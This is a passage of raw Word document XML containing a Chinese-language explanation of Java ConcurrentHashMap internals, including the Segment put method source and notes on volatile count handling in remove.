        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>remove</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>实现并不复杂，但是需要注意如下几点。第一，当要删除的结点存在时，删除的最后一步操作要将</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>count</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>的值减一。这必须是最后一步操作，否则读取操作可能看不到之前对段所做的结构性修改。第二，</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>remove</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>执行的开始就将</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>table</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>赋给一个局部变量</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>tab</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>，这是因为</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>table</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>是</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>volatile</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>变量，</w:t>
      </w:r>
      <w:r w:rsidRPr="005261B2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FF0000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>读写</w:t>
      </w:r>
      <w:r w:rsidRPr="005261B2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FF0000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>volatile</w:t>
      </w:r>
      <w:r w:rsidRPr="005261B2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FF0000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>变量的开销很大</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>。编译器也不能对</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>volatile</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>变量的读写做任何优化，直接多次访问非</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>volatile</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>实例变量没有多大影响，编译器会做相应优化。</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接下来看</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>put</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>操作，同样地</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>put</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>操作也是委托给段的</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>put</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>方法。下面是段的</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>put</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>方法：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00573A3A" w:rsidRPr="00F41A4C" w:rsidRDefault="00573A3A" w:rsidP="00ED0BCD">
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="21"/>
        </w:numPr>
        <w:pBdr>
          <w:top w:val="single" w:sz="6" w:space="0"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V put(K key, </w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="7F0055"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>int</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t> hash, V value, </w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="7F0055"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>boolean</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t> onlyIfAbsent) {  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00573A3A" w:rsidRPr="00F41A4C" w:rsidRDefault="00573A3A" w:rsidP="00ED0BCD">
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="21"/>
        </w:numPr>
        <w:pBdr>
          <w:top w:val="single" w:sz="6" w:space="0"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lock();  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00573A3A" w:rsidRPr="00F41A4C" w:rsidRDefault="00573A3A" w:rsidP="00ED0BCD">
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="21"/>
        </w:numPr>
        <w:pBdr>
          <w:top w:val="single" w:sz="6" w:space="0"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try</w:t>
      </w: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1"/>
        </w:numPr>
        <w:pBdr>
          <w:top w:val="single" w:sz="6" w:space="0"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int</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t> c = count;  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00573A3A" w:rsidRPr="00F41A4C" w:rsidRDefault="00573A3A" w:rsidP="00ED0BCD">
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="21"/>
        </w:numPr>
        <w:pBdr>
          <w:top w:val="single" w:sz="6" w:space="0"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if</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t> (c++ &gt; threshold) </w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="008200"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>// ensure capacity</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1"/>
        </w:numPr>
        <w:pBdr>
          <w:top w:val="single" w:sz="6" w:space="0"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rehash();  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00573A3A" w:rsidRPr="00F41A4C" w:rsidRDefault="00573A3A" w:rsidP="00ED0BCD">
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="21"/>
        </w:numPr>
        <w:pBdr>
          <w:top w:val="single" w:sz="6" w:space="0"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HashEntry&lt;K,V&gt;[] tab = table;  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00573A3A" w:rsidRPr="00F41A4C" w:rsidRDefault="00573A3A" w:rsidP="00ED0BCD">
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="21"/>
        </w:numPr>
        <w:pBdr>
          <w:top w:val="single" w:sz="6" w:space="0"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int</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t> index = hash &amp; (tab.length - </w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="C00000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>1</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1"/>
        </w:numPr>
        <w:pBdr>
          <w:top w:val="single" w:sz="6" w:space="0"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HashEntry&lt;K,V&gt; first = tab[index];  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00573A3A" w:rsidRPr="00F41A4C" w:rsidRDefault="00573A3A" w:rsidP="00ED0BCD">
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="21"/>
        </w:numPr>
        <w:pBdr>
          <w:top w:val="single" w:sz="6" w:space="0"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HashEntry&lt;K,V&gt; e = first;  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00573A3A" w:rsidRPr="00F41A4C" w:rsidRDefault="00573A3A" w:rsidP="00ED0BCD">
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="21"/>
        </w:numPr>
        <w:pBdr>
          <w:top w:val="single" w:sz="6" w:space="0"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lastRenderedPageBreak/>
        <w:t>        </w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="7F0055"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>while</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t> (e != </w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="7F0055"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>null</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t> &amp;&amp; (e.hash != hash || !key.equals(e.key)))  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00573A3A" w:rsidRPr="00F41A4C" w:rsidRDefault="00573A3A" w:rsidP="00ED0BCD">
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="21"/>
        </w:numPr>
        <w:pBdr>
          <w:top w:val="single" w:sz="6" w:space="0"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e = e.next;  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00573A3A" w:rsidRPr="00F41A4C" w:rsidRDefault="00573A3A" w:rsidP="00ED0BCD">
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="21"/>
        </w:numPr>
        <w:pBdr>
          <w:top w:val="single" w:sz="6" w:space="0"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1"/>
        </w:numPr>
        <w:pBdr>
          <w:top w:val="single" w:sz="6" w:space="0"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V oldValue;  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00573A3A" w:rsidRPr="00F41A4C" w:rsidRDefault="00573A3A" w:rsidP="00ED0BCD">
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="21"/>
        </w:numPr>
        <w:pBdr>
          <w:top w:val="single" w:sz="6" w:space="0"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if</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t> (e != </w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="7F0055"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>null</w:t>
      </w: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1"/>
        </w:numPr>
        <w:pBdr>
          <w:top w:val="single" w:sz="6" w:space="0"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oldValue = e.value;  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00573A3A" w:rsidRPr="00F41A4C" w:rsidRDefault="00573A3A" w:rsidP="00ED0BCD">
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="21"/>
        </w:numPr>
        <w:pBdr>
          <w:top w:val="single" w:sz="6" w:space="0"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if</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t> (!onlyIfAbsent)  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00573A3A" w:rsidRPr="00F41A4C" w:rsidRDefault="00573A3A" w:rsidP="00ED0BCD">
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="21"/>
        </w:numPr>
        <w:pBdr>
          <w:top w:val="single" w:sz="6" w:space="0"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e.value = value;  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00573A3A" w:rsidRPr="00F41A4C" w:rsidRDefault="00573A3A" w:rsidP="00ED0BCD">
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="21"/>
        </w:numPr>
        <w:pBdr>
          <w:top w:val="single" w:sz="6" w:space="0"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1"/>
        </w:numPr>
        <w:pBdr>
          <w:top w:val="single" w:sz="6" w:space="0"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else</w:t>
      </w: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1"/>
        </w:numPr>
        <w:pBdr>
          <w:top w:val="single" w:sz="6" w:space="0"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oldValue = </w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="7F0055"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>null</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1"/>
        </w:numPr>
        <w:pBdr>
          <w:top w:val="single" w:sz="6" w:space="0"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++modCount;  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00573A3A" w:rsidRPr="00F41A4C" w:rsidRDefault="00573A3A" w:rsidP="00ED0BCD">
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="21"/>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tab[index] = </w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="7F0055"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>new</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t> HashEntry&lt;K,V&gt;(key, hash, first, value);  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00573A3A" w:rsidRPr="00F41A4C" w:rsidRDefault="00573A3A" w:rsidP="00ED0BCD">
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="21"/>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count = c; </w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="008200"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>// write-volatile</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1"/>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1"/>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return</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t> oldValue;  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00573A3A" w:rsidRPr="00F41A4C" w:rsidRDefault="00573A3A" w:rsidP="00ED0BCD">
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="21"/>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 </w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="7F0055"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>finally</w:t>
      </w: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1"/>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unlock();  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00573A3A" w:rsidRPr="00F41A4C" w:rsidRDefault="00573A3A" w:rsidP="00ED0BCD">
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="21"/>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1"/>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该方法也是在持有段锁的情况下执行的，首先判断是否需要</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>rehash</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>，需要就先</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>rehash</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>。接着是找是否存在同样一个</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>key</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>的结点，如果存在就直接替换这个结点的值。</w:t>
      </w:r>
      <w:r w:rsidRPr="008C10BC">
        <w:rPr>
